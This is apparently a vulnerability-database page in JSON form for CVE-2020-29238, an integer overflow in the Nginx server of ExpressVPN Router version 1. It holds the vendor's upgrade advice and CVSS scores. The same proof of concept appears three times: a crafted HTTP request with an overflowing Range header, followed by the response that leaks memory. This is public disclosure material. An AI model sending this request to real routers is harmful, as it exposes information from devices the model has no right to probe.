ExpressVPN VPN Router 1.0 Integer Overflow

2021-04-13T00:00:00

Description

{"id": "PACKETSTORM:162152", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ExpressVPN VPN Router 1.0 Integer Overflow", "description": "", "published": "2021-04-13T00:00:00", "modified": "2021-04-13T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://packetstormsecurity.com/files/162152/ExpressVPN-VPN-Router-1.0-Integer-Overflow.html", "reporter": "Jai Kumar Sharma", "references": [], "cvelist": ["CVE-2020-29238"], "immutableFields": [], "lastseen": "2021-04-13T15:51:15", "viewCount": 374, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-29238"]}, {"type": "exploitdb", "idList": ["EDB-ID:49760"]}, {"type": "zdt", "idList": ["1337DAY-ID-36098"]}], "rev": 4}, "score": {"value": 7.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "canvas", "idList": ["NGINX"]}, {"type": "cve", "idList": ["CVE-2020-29238"]}, {"type": "exploitdb", "idList": ["EDB-ID:49760"]}, {"type": "zdt", "idList": ["1337DAY-ID-36098"]}]}, "exploitation": null, "vulnersScore": 7.2}, "sourceHref": "https://packetstormsecurity.com/files/download/162152/expressvpn10-overflow.txt", "sourceData": "`# Exploit Title: ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow \n# Date: 09-04-2021 \n# Exploit Author: Jai Kumar Sharma \n# Vendor Homepage: https://www.expressvpn.com/ \n# Software Link: https://www.expressvpn.com/vpn-software/vpn-router \n# Version: version 1 \n# Tested on: Windows/Ubuntu/MacOS \n# CVE : CVE-2020-29238 \n \n*Proof of concept*: \n \nExpressVPN Router's Login Panel runs on Nginx webserver, the version v1 of the router's firmware hosts web login panel on vulnerable web server \n \nExpressVPN Summary: A publicly known bug in the Nginx server used by the ExpressVPN Router version 1.x firmware was reported. ExpressVPN no longer ships or supports that version and all users are encouraged to upgrade to the latest version of the ExpressVPN Router firmware available on our site, which is not vulnerable to this bug. Additionally, we highly discourage our users from exposing their router control panel to the Internet, as this class of bug would only be exploitable with access to the control panel, which is usually restricted to the local network. For help or support upgrading your router please visit: https://www.expressvpn.com/support/ \n \nExpressVPN Router version 1 is vulnerable to integer overflow vulnerability in Nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request. \n \nCrafted Request: \nGET / HTTP/1.1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) \nGecko/20100101 Firefox/81.0 \nHost: 127.0.0.1:8181 \nAccept-Encoding: identity \nRange: bytes=-17208,-9223372036854758999 \nConnection: close \n \n \nResponse: \nHTTP/1.1 206 Partial Content \nServer: nginx/1.9.15 \nDate: Tue, 10 Nov 2020 19:22:05 GMT \nContent-Type: multipart/byteranges; boundary=00000000002 \nContent-Length: 598 \nLast-Modified: Thu, 13 Sep 2018 04:55:28 GMT \nConnection: close \nETag: \"5b99edc0-99f\" \n \n \n--00000000002 \nContent-Type: text/html \nContent-Range: bytes -14745-2462/2463 \n \n`\n", "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{"cve": [{"lastseen": "2022-03-23T17:21:15", "description": "An integer buffer overflow in the Nginx webserver of ExpressVPN Router version 1 allows remote attackers to obtain sensitive information when the server running as reverse proxy via specially crafted request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-10T03:15:00", "type": "cve", "title": "CVE-2020-29238", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29238"], "modified": "2021-04-13T18:15:00", "cpe": ["cpe:/a:expressvpn:expressvpn:1.0"], "id": "CVE-2020-29238", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29238", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:expressvpn:expressvpn:1.0:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2021-10-16T22:49:45", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-04-13T00:00:00", "type": "zdt", "title": "ExpressVPN VPN Router 1.0 - Router Login Panels Integer Overflow Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29238"], "modified": "2021-04-13T00:00:00", "id": "1337DAY-ID-36098", "href": "https://0day.today/exploit/description/36098", "sourceData": "# Exploit Title: ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow\r\n# Exploit Author: Jai Kumar Sharma\r\n# Vendor Homepage: https://www.expressvpn.com/\r\n# Software Link: https://www.expressvpn.com/vpn-software/vpn-router\r\n# Version: version 1\r\n# Tested on: Windows/Ubuntu/MacOS\r\n# CVE : CVE-2020-29238\r\n\r\n*Proof of concept*:\r\n\r\nExpressVPN Router's Login Panel runs on Nginx webserver, the version v1 of the router's firmware hosts web login panel on vulnerable web server\r\n\r\nExpressVPN Summary: A publicly known bug in the Nginx server used by the ExpressVPN Router version 1.x firmware was reported. ExpressVPN no longer ships or supports that version and all users are encouraged to upgrade to the latest version of the ExpressVPN Router firmware available on our site, which is not vulnerable to this bug. Additionally, we highly discourage our users from exposing their router control panel to the Internet, as this class of bug would only be exploitable with access to the control panel, which is usually restricted to the local network. For help or support upgrading your router please visit: https://www.expressvpn.com/support/\r\n\r\nExpressVPN Router version 1 is vulnerable to integer overflow vulnerability in Nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.\r\n\r\nCrafted Request:\r\nGET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0)\r\nGecko/20100101 Firefox/81.0\r\nHost: 127.0.0.1:8181\r\nAccept-Encoding: identity\r\nRange: bytes=-17208,-9223372036854758999\r\nConnection: close\r\n\r\n\r\nResponse:\r\nHTTP/1.1 206 Partial Content\r\nServer: nginx/1.9.15\r\nDate: Tue, 10 Nov 2020 19:22:05 GMT\r\nContent-Type: multipart/byteranges; boundary=00000000002\r\nContent-Length: 598\r\nLast-Modified: Thu, 13 Sep 2018 04:55:28 GMT\r\nConnection: close\r\nETag: \"5b99edc0-99f\"\r\n\r\n\r\n--00000000002\r\nContent-Type: text/html\r\nContent-Range: bytes -14745-2462/2463\n\n# 0day.today [2021-10-17] #", "sourceHref": "https://0day.today/exploit/36098", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2022-01-13T05:29:25", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-04-13T00:00:00", "type": "exploitdb", "title": "ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29238", "2020-29238"], "modified": "2021-04-13T00:00:00", "id": "EDB-ID:49760", "href": "https://www.exploit-db.com/exploits/49760", "sourceData": "# Exploit Title: ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow\r\n# Date: 09-04-2021\r\n# Exploit Author: Jai Kumar Sharma\r\n# Vendor Homepage: https://www.expressvpn.com/\r\n# Software Link: https://www.expressvpn.com/vpn-software/vpn-router\r\n# Version: version 1\r\n# Tested on: Windows/Ubuntu/MacOS\r\n# CVE : CVE-2020-29238\r\n\r\n*Proof of concept*:\r\n\r\nExpressVPN Router's Login Panel runs on Nginx webserver, the version v1 of the router's firmware hosts web login panel on vulnerable web server\r\n\r\nExpressVPN Summary: A publicly known bug in the Nginx server used by the ExpressVPN Router version 1.x firmware was reported. ExpressVPN no longer ships or supports that version and all users are encouraged to upgrade to the latest version of the ExpressVPN Router firmware available on our site, which is not vulnerable to this bug. Additionally, we highly discourage our users from exposing their router control panel to the Internet, as this class of bug would only be exploitable with access to the control panel, which is usually restricted to the local network. For help or support upgrading your router please visit: https://www.expressvpn.com/support/\r\n\r\nExpressVPN Router version 1 is vulnerable to integer overflow vulnerability in Nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.\r\n\r\nCrafted Request:\r\nGET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0)\r\nGecko/20100101 Firefox/81.0\r\nHost: 127.0.0.1:8181\r\nAccept-Encoding: identity\r\nRange: bytes=-17208,-9223372036854758999\r\nConnection: close\r\n\r\n\r\nResponse:\r\nHTTP/1.1 206 Partial Content\r\nServer: nginx/1.9.15\r\nDate: Tue, 10 Nov 2020 19:22:05 GMT\r\nContent-Type: multipart/byteranges; boundary=00000000002\r\nContent-Length: 598\r\nLast-Modified: Thu, 13 Sep 2018 04:55:28 GMT\r\nConnection: close\r\nETag: \"5b99edc0-99f\"\r\n\r\n\r\n--00000000002\r\nContent-Type: text/html\r\nContent-Range: bytes -14745-2462/2463", "sourceHref": "https://www.exploit-db.com/download/49760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}

ExpressVPN VPN Router 1.0 Integer Overflow

Description

Related